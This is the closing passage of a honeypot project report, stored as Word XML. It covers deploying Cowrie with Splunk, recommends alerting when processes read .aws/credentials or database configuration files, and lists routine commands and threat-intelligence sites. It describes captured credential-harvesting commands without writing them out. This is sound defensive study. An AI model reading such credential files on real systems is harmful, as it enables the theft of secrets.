      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6D6092" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc231686596"/>
      <w:r>
        <w:t>Recommendation 3 — Deploy Real-Time Credential File Access Monitoring</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="551E945C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three of the seven commands captured targeted credential files directly — /etc/passwd, MySQL configuration, and AWS access keys. This mirrors the attack vector behind IBM's documented $4.88 million average breach cost in 2024, where cloud credential theft was identified as the primary cost driver. Organisations should implement process-level alerting on sensitive credential files using tools such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osquery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, or AWS CloudTrail. Any process </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>reading .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/credentials or database configuration files outside approved applications should trigger an immediate SOC alert — the same principle demonstrated by this project's Splunk real-time alert rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E66AA" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="5D0B95BC" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="6331377C" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="18F565E8" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="0184831F" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="6D17DD43" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="7615F786" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="33DF14CF" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="67F4C5FC" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="361C2FAB" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="3A36489E" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="101C2BA9" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="6086B1A2" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="20418218" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="7F368290" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="54A4022C" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="75626C0E" w14:textId="77777777" w:rsidR="00044AD9" w:rsidRDefault="00044AD9"/>
    <w:p w14:paraId="3C25480C" w14:textId="0E5E9FA1" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc231686597"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.6 Conclusions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="7D49C85A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Internet-facing SSH services face automated, credential-based attacks that are faster, more predictable, and more damaging than most organisational defences are configured to detect. The attack sequence captured in this deployment — brute force entry at 22:38:15, immediate credential harvesting across database and cloud systems, and attempted malware staging — completed in under one second, confirming that manual monitoring and perimeter-only defences are structurally insufficient against automated tooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298164A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The combination of Cowrie's deception layer and Splunk's SIEM pipeline demonstrated that even minimal-resource honeypot infrastructure produces intelligence that directly informs firewall rules, detection logic, and credential hardening priorities. The real-time alert rule reduced theoretical attacker dwell time from the 197-day industry average to seconds. A public cloud deployment of this same infrastructure would begin capturing genuine attacker data within minutes and contribute IP blocklists and attack signatures to the broader threat intelligence community through platforms such as AlienVault OTX and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AbuseIPDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9BD671" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Competencies Demonstrated: This deployment required and validated competency across the full deception technology stack — Ubuntu Server provisioning, Cowrie deployment with production-grade deception layers, complete attack lifecycle capture, MITRE ATT&amp;CK forensic mapping across five techniques, and end-to-end SIEM workflow from log ingestion through dashboard visualisation to real-time alerting — consistent with entry-level to mid-level SOC analyst responsibilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487EAAC8" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6A8CB4" w14:textId="03CF8423" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc231686598"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix — Quick Reference</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="18A4AB43" w14:textId="03CF8423" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc231686599"/>
      <w:r>
        <w:t>A — Cowrie Commands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7D1F2501"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004AE2F7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Command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53F1C4FE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Operational Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="297877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EDB92B2" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cowrie-env/bin/cowrie start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8978FE8" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Start the Cowrie honeypot process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="02CE74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8FF009" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cowrie-env/bin/cowrie stop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F8547F" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stop Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="54F986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547612E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cowrie-env/bin/cowrie restart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E67F39C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Restart Cowrie and apply configuration changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="2F7968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ADC779" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cowrie-env/bin/cowrie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CA144B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Verify honeypot service state and confirm PID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="0FFD28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FBBF4BD" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tail -f var/log/cowrie/cowrie.log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8A8D4EB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Monitor live attack activity in real time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="351BAA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0928EB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>grep 'CMD' var/log/cowrie/cowrie.log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73CA10" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Extract all commands typed by attackers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="7809F2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5746DC" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>grep 'login attempt' var/log/cowrie/cowrie.log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C4617C1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Extract all authentication attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="56F160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ABBDDE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie-env/bin/cowrie </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>playlog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> var/lib/cowrie/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tty</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/FILENAME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9FC264" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Replay a recorded attacker terminal session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77E77B40" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc231686600"/>
      <w:r>
        <w:t>B — Linux Operational Commands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0AF3E8D3"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067041A9" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Command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1B93AA2B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Operational Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="0AF27B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A3798C7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ss -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tlnp</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1ECF7FD" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enumerate active listening services and verify honeypot port binding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="74432D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826299" w14:textId="77777777" w:rsidR="0062444D"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status cowrie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0D4600" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Validate honeypot service state and confirm uptime continuity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="630242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02B62B0" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> iptables -L -t </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nat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B75D893" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Audit NAT redirect rules ensuring port 22 traffic routes correctly to Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="30511C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C5381F" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -l cowrie.log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06E376" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Quantify log volume as a baseline metric for attack activity measurement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="015A6DE4" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc231686601"/>
      <w:r>
        <w:t>C — Threat Intelligence Resources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2444D" w14:paraId="444D1CE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05367F53" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Resource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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16BF4F2D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Operational Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="311A17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D5B13FB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>otx.alienvault.com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A1A6179" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Look up attacker IP addresses — surfaces known threat actors, geolocation, and historical attack reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="00562E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13D48E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>virustotal.com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CE2B0C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scan files downloaded by attackers for malware identification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="48A7F8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5456E43" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>attack.mitre.org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A3A96F" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reference MITRE ATT&amp;CK technique IDs for observed attacker commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="788297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F0C3D5" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>shodan.io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95A25D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>External perspective on honeypot exposure — verify what attackers see during reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="0724AC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4FA57BF" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>abuseipdb.com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3052336" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cross-reference attacker IPs against community-reported malicious addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="348569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08FA8C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ipinfo.io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809949" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Retrieve country and ISP attribution data for attacker IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A1940CD" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc231686602"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>D — Operational Notes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="45D7D4DC" w14:textId="260AF1DB" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deployment encountered two noteworthy technical challenges. Legacy iptables rules from a previous installation silently redirected traffic without generating diagnostic errors, requiring systematic NAT rule auditing before honeypot traffic flow was confirmed. Splunk ingestion required explicit JSON </w:t>
      </w:r>
      <w:r w:rsidR="00E10604">
        <w:t>source type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> configuration to correctly parse Cowrie's structured log output. Both issues were resolved through methodical verification at each pipeline stage — connection, redirect, ingestion, and dashboard — and are documented here as reference for operational replication.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0062444D" w:rsidSect="00737B11">
      <w:headerReference w:type="default" r:id="rId15"/>
      <w:footerReference w:type="default" r:id="rId16"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1276" w:right="1260" w:bottom="1418"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6EAC9" w14:textId="77777777" w:rsidR="002045CF" w:rsidRDefault="002045CF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4B0A1C4C" w14:textId="77777777" w:rsidR="002045CF" w:rsidRDefault="00204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3882" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
      </w:pBdr>
      <w:spacing w:before="100"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Cowrie SSH Honeypot </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Deployment  |</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  Page </w:t>
    </w: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9F18E8">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:color w:val="1F3864"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F3864"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F3864"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F3864"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F3864"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="009F18E8">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:color w:val="1F3864"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>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B5C0" w14:textId="77777777" w:rsidR="002045CF" w:rsidRDefault="002045CF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="549E9A07" w14:textId="77777777" w:rsidR="002045CF" w:rsidRDefault="00204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C4FDC" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F3864"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>DECEPTION TECHNOLOGY &amp; HONEYPOT NETWORK PROJECT</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="2E75B6"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Moses Isemin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71B0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C884FE5A"/>
    <w:lvl w:ilvl="0" w:tplc="75084972">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F22AD2B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="909ACA28">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0C80DFD6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9CD64950">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
